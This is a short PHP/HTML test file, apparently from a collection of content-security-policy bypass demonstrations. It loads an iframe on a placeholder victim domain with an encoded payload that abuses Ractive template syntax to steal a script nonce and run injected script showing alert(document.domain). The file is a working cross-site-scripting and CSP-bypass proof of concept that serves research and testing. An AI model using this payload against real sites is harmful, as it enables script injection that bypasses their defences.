<iframe src="//victim.example.com/repo/csp/sd/ractive.php?csp=nonces&inj=<?php
$payload = <<<PAYLOAD
<script id='template' type='text/ractive'><iframe srcdoc='<script nonce={{@global.document.currentScript.nonce}}>alert(document.domain)</{{}}script>'></iframe></script>
<script>nonce_beacon()</script>
PAYLOAD;
echo rawurlencode($payload);
?>"></iframe>
